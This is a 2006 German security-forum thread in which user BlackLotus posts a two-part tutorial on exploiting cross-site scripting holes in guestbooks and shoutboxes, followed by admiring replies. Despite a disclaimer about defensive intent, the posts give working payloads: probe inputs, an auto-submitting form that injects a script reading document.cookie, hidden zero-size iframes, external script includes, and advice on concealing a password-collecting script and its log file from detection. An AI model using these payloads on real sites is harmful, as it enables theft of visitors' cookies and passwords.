Willkommen bei Network & Security     remoteshell-security.com
Partnerseiten
login.php?sid=478a3f8a2203f7d6f0b1460382389ac0 profile.php?mode=register&sid=478a3f8a2203f7d6f0b1460382389ac0 faq.php?sid=478a3f8a2203f7d6f0b1460382389ac0 memberlist.php?sid=478a3f8a2203f7d6f0b1460382389ac0 search.php?sid=478a3f8a2203f7d6f0b1460382389ac0 index.php?sid=478a3f8a2203f7d6f0b1460382389ac0

Foren-Übersicht » Sicherheitslücken » [TUT]Gästebuch-Schwachstellen
Neues Thema eröffnen  Neue Antwort erstellen Vorheriges Thema anzeigen :: Nächstes Thema anzeigen 
[TUT]Gästebuch-Schwachstellen
BeitragVerfasst am: 23.02.2006 03:26 Antworten mit Zitat
BlackLotus
Anmeldedatum: 04.01.2006
Beiträge: 717
Wohnort: www and 127.0.0.1/localhost




Die Tutorials in diesem Forum sollen keine Anleitung zur Kompromittierung von Serverdiensten geben. Der Leser sollte sich bemühen, Sicherheitslücken zu erkennen und zu beheben - zu diesem Zweck werden diese Tutorials geschrieben. Bitte verwendet die hier gezeigten Methoden nicht für illegale Aktivitäten.

Also noch ein TUT von mir Wink
Gästebuch und Shoutbox Lücken Smile
Ich hab das in vielen meiner Beiträge schon angeschnitten nie aber genau erläutert.
Also los auf jeder guten HP gibt es was?
Richtig ein Forum,bzw. Gästebuch oder auch eine Shoutbox.
Diese 3 Dinge sind immer potentielle Schwachstellen,alle aus diesem Forum müssten das zwar kennen aber ich schreibe dieses TUT trotzdem nieder^^

1)Was für Lücken gibt es?
2)Wie kann man sie am besten nutzen ohne das es auffällt?
3)Ausnutzen der Lücken!(Praxis)
_____________________________________________________

1)
Macht mal probeweise einen Eintrag.Dieser sollte ca. so aussehen:
Code:

Name: >"BlackLotus"<
email: maxmusterm@gmail.com"></a><a href="
Homepage:http://google.de"></a><a href="
Nachricht:BlaBlac mfG >"BlackLotus"<

Danach ab in den Quelltext und nach BlackLotus,maxmusterm,google und mfG suchen.
Sobald ihr entdeckt habt,dass ein Eintrag nicht validiert wurde freuet euch Smile

Falls die erste Möglichkeit nicht gehen sollte nicht verzagen!Auch hierrauf meine Antwort.Erstellt eine html Datei.Durchsucht den Quelltext nach dem inputfenster für den Namen und den Nachrichtentext und merkt euch die bezeichnung ide nach dem nam=" kommt.Sucht im Quelltext nach der form und mekrt euch den action-wert setzt aus diesem und der URL die komplette form-action-url zusammen.
Der Quelltext eurer html Datei sollte so aussehen:

Die html Datei sollte so aus
Code:

<html>
<body>
<form action="form-action-url" name="senden" method="post">
<input name="name" value='"><script>alert(document.cookie)</script>'>
</form>
<script>document.senden.submit()</script>
</body>
</form>

Startet die jetzt einmal lokal und guckt ob eine messagebox erscheint,wenn ja habt ihr es geschafft wenn nein ändert den Quelltext so um,dass statt name="name" name="textboxinhalt" da steht,noch ein Test und... gehts?Wenn nein probiert es mit allen Feldern aus.Sobald es geht habt ihr eine potentielle Lücke gefunden.


Das war Teil1 meines 3teiligen TUTs morgen gibt es Teil 2 Bewertung wäre nett Copyleft by BlackLotus
have fun

_________________
Eine Kette ist nur so stark wie ihr schwächstes Glied.

Die Welt wird nicht von denen bedroht die böse sind,sondern von denen die das Böse zulassen.
Albert Einstein

Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das Very Happy

http://blackwiki.bl.ohost.de
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 23.02.2006 05:17 Antworten mit Zitat
Rebellion
Anmeldedatum: 04.01.2006
Beiträge: 151
Wohnort: %systemroot%




Ich interessier mich in letzter Zeit sowieso viel für XSS, von daher sind die Tutorials genau richtig.
Also Bewertung kann ich nur sagen.. really nice w0rk Smile

Besonders die Beispiel-Codes gefallen mir dabei.
Solche Tuts findet man bestimmt nicht leicht im Internet..
Das meiste, was ich sonst über XSS gelesen hab war zu allgemein.. das übliche Zeug halt ^^

Bin mal gespannt auf die andern Parts
Benutzer-Profile anzeigen Private Nachricht senden ICQ-Nummer
BeitragVerfasst am: 23.02.2006 17:01 Antworten mit Zitat
BlackLotus
Anmeldedatum: 04.01.2006
Beiträge: 717
Wohnort: www and 127.0.0.1/localhost




Thx erstma^^steckt viel Übung dahinter hatte erst meine Probleme hab mir dann ein paar kleine Tricks ausgedacht um die Effiziens zu steigern.Interresier mich ja auch in letzter Zeit für XSS Wink
Also Teil 2:
___________________________________________________
2)Wie kann man sie am besten nutzen ohne das es auffällt?

Das ist ein kurzes Kapitel in meinem TUT^^
Also normalerweise will man ja durch XSS PWs rausfinden also legt man sich nen Ordner an z.B. Test und um ein bisschen zu verschleiern legt man da ne index.html ab die einen zu der Fehlerseite von dem freehoster führt Wink
Das geht durch den eifnachen Code:
Code:

<html>
<body>
<script>
window.location="http://google.de"
</script>
</body>
</html>

Ihr könnt uach nen Forum oder so reinlegen ist eurer Phantasie überlassen.
In den Ordner kommt jetzt noch das Speicherscript und das wars auch schon^^Noch anzumerken das man die Passwortdatei nicht pws.txt oder so nennen sollte sondern lieber sfafeh.txt Wink

So jetzt noch der Teil vom verschleiern des Scriptes am besten macht ihr das so:

(XSS Lücke im GB beim posten)
Einfach durch ein <script src=...> zu eurem JS verlinken.

(XSS Lücke in der URL)
Wenn ihr wie bei numaek den Code an die URL dran hängen könnt macht ihr einfach eine Seite mit folgendem Code.
Code:

video/Java Application
<iframe frameborder="0" width="0" height="0" src="http://opferseite.de/?script">


(XSS Lücke beim posten)
dafür macht ihr euch eine test.html mit dme Code:
Code:

<html>
<body>
<form action="http://opferseite.de/gb/index.php" method="post" name="senden">
<input name="name" value="böhses Script">
</form>
<script>
document.senden.submit()
</script>
</body>
</html>

Das script versteckt ihr wiederrum in einem iframe auf der index.html wie oben.

Die links auf die das Opfer gehen muss postet ihr eifnach im GB^^
so das war Teil 2 Teil 3 kommt morgen copyleft by BlackLotus
have fun Wink

_________________
Eine Kette ist nur so stark wie ihr schwächstes Glied.

Die Welt wird nicht von denen bedroht die böse sind,sondern von denen die das Böse zulassen.
Albert Einstein

Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das Very Happy

http://blackwiki.bl.ohost.de
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 23.02.2006 19:04 Antworten mit Zitat
Cerox
Anmeldedatum: 31.12.2005
Beiträge: 782
Wohnort: Engelskirchen




Auch ich kann mich nur anschließen: Das waren beides sehr gute Tutorials, gut erklärt mit Beispielen - da kann man nicht meckern.
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 23.02.2006 19:05 Antworten mit Zitat
Phara0h
Anmeldedatum: 31.12.2005
Beiträge: 357
Wohnort: /dev/RL




Freu mich schon auf part 3 ^^
Ich glaub am WE versuche ich mal ne gmx-fake Mail zu basteln^^

_________________
Benutzer-Profile anzeigen Private Nachricht senden Jabber ID
BeitragVerfasst am: 31.07.2006 04:41 Antworten mit Zitat
Rebellion
Anmeldedatum: 04.01.2006
Beiträge: 151
Wohnort: %systemroot%




BlackLotus hat Folgendes geschrieben:
Teil 3 kommt morgen copyleft by BlackLotus


Kommt eigentlich noch Teil 3? Very Happy
Benutzer-Profile anzeigen Private Nachricht senden ICQ-Nummer
BeitragVerfasst am: 04.09.2006 11:57 Antworten mit Zitat
BlackLotus
Anmeldedatum: 04.01.2006
Beiträge: 717
Wohnort: www and 127.0.0.1/localhost




Teil 3 hatte ich gepostet das war in dem alten Unitet Kiddys script wenn ich mich nicht Irre oder?
Da hab ich das alles ja praktisch demonstriert gehabt Wink

_________________
Eine Kette ist nur so stark wie ihr schwächstes Glied.

Die Welt wird nicht von denen bedroht die böse sind,sondern von denen die das Böse zulassen.
Albert Einstein

Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das Very Happy

http://blackwiki.bl.ohost.de
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
BeitragVerfasst am: 04.09.2006 15:52 Antworten mit Zitat
Rebellion
Anmeldedatum: 04.01.2006
Beiträge: 151
Wohnort: %systemroot%




Ahso stimmt ja, sry Laughing
Benutzer-Profile anzeigen Private Nachricht senden ICQ-Nummer
BeitragVerfasst am: 04.09.2006 18:11 Antworten mit Zitat
BlackLotus
Anmeldedatum: 04.01.2006
Beiträge: 717
Wohnort: www and 127.0.0.1/localhost




np^^ hab ja auch erst jetzt geanwtwortet *g*

_________________
Eine Kette ist nur so stark wie ihr schwächstes Glied.

Die Welt wird nicht von denen bedroht die böse sind,sondern von denen die das Böse zulassen.
Albert Einstein

Man kommt nicht aus seiner Haut raus.....,
Nur Schlamm kann das Very Happy

http://blackwiki.bl.ohost.de
Benutzer-Profile anzeigen Private Nachricht senden E-Mail senden
[TUT]Gästebuch-Schwachstellen
Foren-Übersicht » Sicherheitslücken
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Alle Zeiten sind GMT + 1 Stunde  
Seite 1 von 1  

  
  
 Neues Thema eröffnen  Neue Antwort erstellen  


Forensicherheit

Powered by phpBB © 2001-2004 phpBB Group
phpBB Style by Vjacheslav Trushkin
Deutsche Übersetzung von phpBB.de


remoteshell-security.com | Partner | Boardregeln | Impressum